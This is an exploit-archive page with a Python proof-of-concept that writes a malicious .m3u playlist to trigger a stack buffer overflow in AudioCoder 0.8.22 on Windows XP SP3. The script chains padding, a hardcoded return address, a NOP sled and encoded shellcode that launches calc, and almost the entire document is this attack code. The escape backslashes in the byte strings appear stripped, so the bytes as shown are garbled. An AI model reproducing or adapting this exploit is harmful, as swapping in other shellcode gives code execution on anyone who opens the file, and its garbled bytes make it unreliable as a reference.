[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AudioCoder 0.8.22 (.m3u) - Direct Retn Buffer Overflow
# Published : 2013-06-24
# Author :
# Previous Title : Adrenalin Player 2.2.5.3 - Buffer Overflow Exploit (SEH)
# Next Title : Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation


# !/usr/bin/python
# Title: AudioCoder 0.8.22 - Direct Retn Buffer OverFlow
# version: 0.8.22 build 5506 (built on May 27 2013, 00:22:49)
# link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe
# Platform: Windows XP sp3
# Date: June 21th, 2013
# Author: onying (@onyiing)
# Blog : http://itsecuritynewbie.blogspot.com/
# Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com   

header = "http://"
junk = "x41" * 249
junk+= "x53x93x42x7E"
junk+= "x90" * 16

#win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai
junk+=("xb8xe2x59x26xe6x33xc9xdaxddxb1x51xd9x74x24xf4x5e"
"x31x46x10x83xc6x04x03xa4x55xc4x13xd4x0cxe3x91xcc"
"x28x0cxd6xf3xabx78x45x2fx08xf4xd3x13xdbx76xd9x13"
"xdax69x6axacxc4xfex32x12xf4xebx84xd9xc2x60x17x33"
"x1bxb7x81x67xd8xf7xc6x70x20x3dx2bx7fx60x29xc0x44"
"x30x8ax01xcfx5dx59x0ex0bx9fxb5xd7xd8x93x02x93x81"
"xb7x95x48x3exe4x1ex07x2cxd0x3cx79x6fx29xe6x1dxe4"
"x09x28x55xbax81xc3x19x26x37x58x99x5ex19x37x94x10"
"xabx2bxf8x53x65xd5xaaxcdxe2x29x7fx79x84x3ex4dx26"
"x3ex3ex61xb0x75x2dx7ex7bxdax51xa9x24x53x48x30x5b"
"x8ex9bxbfx0ex3bx9ex40x60xd3x47xb7x75x89x2fx37xa3"
"x81x9cx94x18x75x60x48xddx2ax99xbex87xa4x74x63x21"
"x66xfex7ax38xe0xa4x67x32x36xf3x68x64xd2xecxc7xdd"
"xdcxddx80x79x8fxf0xb9xd6x2fxdax69x8dx30x33xe5xc8"
"x86x32xbfx45xe6xedx10x3dx4cx47x6ex6dxffx0fx77xf4"
"xc6xa9x20xf9x11x1cx30xd5xf8xf5xaaxb3x6cx69x5exb2"
"x88x07xf0x9dx7bx14x79xfax16xe0xf3xe6xd6x28xf0x4c"
"xe6xebxdax6ex55xc0xb7x03x20x20x13xb0x7ex38x11x38"
"x33xafx2axb1x70x2fx02x62x2ex9dxfaxc5x81x4bxfcxb4"
"x70xd9xafxc9xa3x89xe2xecx41x84xaexf1x9cx72xaexf2"
"x16x7cx80x87x0ex7exa2x53xd4x81x73x09xeaxaex14xd3"
"xccxadx96x78x12xe7xa6xae")
file = open("audiocoder.m3u" , "w")
file.write(header+junk)
file.close()